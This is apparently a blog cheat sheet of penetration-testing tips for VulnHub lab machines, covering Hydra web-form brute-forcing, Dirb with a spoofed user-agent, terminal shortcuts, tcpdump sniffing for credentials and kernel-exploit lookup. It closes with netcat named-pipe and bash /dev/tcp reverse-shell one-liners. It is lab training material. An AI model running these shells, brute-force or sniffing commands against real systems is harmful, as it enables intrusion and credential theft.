Brute Forcing Forms with Hydra
Hydra is more capable than just brute-forcing services, this tool can also brute force web forms.
|
1 |
hydra -v -L mypusers -P /usr/share/wordlists/rockyou.txt -s 8000 127.0.0.1 http-post-form "/login:username=^USER^&password=^PASS^":"F=Failed" |
Dirb/DirBuster not returning anything? Change the user-agent.
Some applications can be programmatically set up to deflect penetration testing. In this example, I was using VulnHub: Node and wasn’t getting any responses using Dirb.
|
1 |
dirb http://192.168.0.32:3000/ -a "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" /usr/share/wordlists/dirb/big.txt |
Shell Terminal Tricks
Once acquiring a reverse shell you may find that things like “clear” and “reset” don’t work. This may make it more difficult to interact with. By setting the TERM variable this fixes that with ease.
|
1 2 3 4 |
export TERM=xterm # or you can use grep to find and set set | grep TERM |
Sudo Bang Bang
If you recently ran a command that should have been ran with sudo before it you can re-run that exact command by typing:
|
1 |
sudo !! |
Terminal Shortcuts
This video really improved my game when it comes to the terminal.
CTRL + A – moves the cursor to the beginning of the line
CTRL + C – cancels out of current command/application
CTRL + D – delete characters, if no characters it will log you out and close your current terminal session
CTRL + K – deletes everything to end of the line
CTRL + L – clears screen
CTRL + N – navigate forward when using CTRL + P
CTRL + P – pastes previous command
CTRL + R – search through previous commands
CTRL + S – stops output to screen. Useful with long runnings command CTRL + Q – resume output to the screen.
CTRL + U – clears from cursor to beginning of the command
CTRL + Y – yanks
CTRL + X + E – edit current buffer
CTRL + W – deletes word
CTRL + Z – send a process to the background
CTRL + ALT + BACKSPACE – Kill the current server
CTRL + SHIFT + Q – closes current terminal
ALT + B – go left or previous word
ALT + F – go forward or next word
ALT + . – pastes previous command’s argument
Not Getting Enough Results?
Try other tools. Sometimes the other tools will display information the others won’t. It can be mission-critical if you miss a key detail. Here is a list of tools for each process.
Brute Forcing
Hydra, Burp Suite, wfuzz, wpscan, roll your own using Bash/Python/PowerShell
Directory Traversal
Dirb, GoBuster, Dirstalk
Zip Password Cracking
john, fzipcrack
Privilege Escalation
If you’re stuck on finding a privilege escalation here are some things you could try.
Monitoring Internal Traffic
In theory, this would be a go-to on a live server but in a VulnHub sometimes they replicate human behavior by running scripts. You may capture an FTP login credentials by monitoring the data. This data can be downloaded and viewed with WireShark to reveal sensitive information.
|
1 2 3 4 5 |
# display interfaces tcpdump -D # monitor and put all data in cap.pcap file from interface eth0 timeout 200 tcpdump -w cap.pcap -i eth0 |
LinEnum
https://github.com/rebootuser/LinEnum
If you’ve acquired a shell and can run a script then pull this script and run it. It will give you an enormous amount of information.
Kernel Exploits
Most VulnHubs will be privilege related but occasionally I come across a kernel exploit. Using the commands below you can identify your kernel and look up exploits in Exploit DB.
|
1 2 3 4 5 6 |
# how to find out information about the linux kernel uname -a cat /proc/version hostnamectl | grep Kernel |
Netcat with no -e option? Use a named pipe!
In an effort to make systems more secure some versions of Netcat do not include the “-e” option. You can get around this by using a named pipe to pipe an interactive shell into Netcat.
I learned this from Dot Dot Slash on the Node 1 Walkthrough
|
1 |
rm /tmp/nce; mkfifo /tmp/nce; cat /tmp/nce | /bin/sh -i 2>&1 | nc 192.168.0.23 443 > /tmp/nce |
|
1 2 |
# or use bash bash -i >& /dev/tcp/192.168.1.69/443 0>&1 |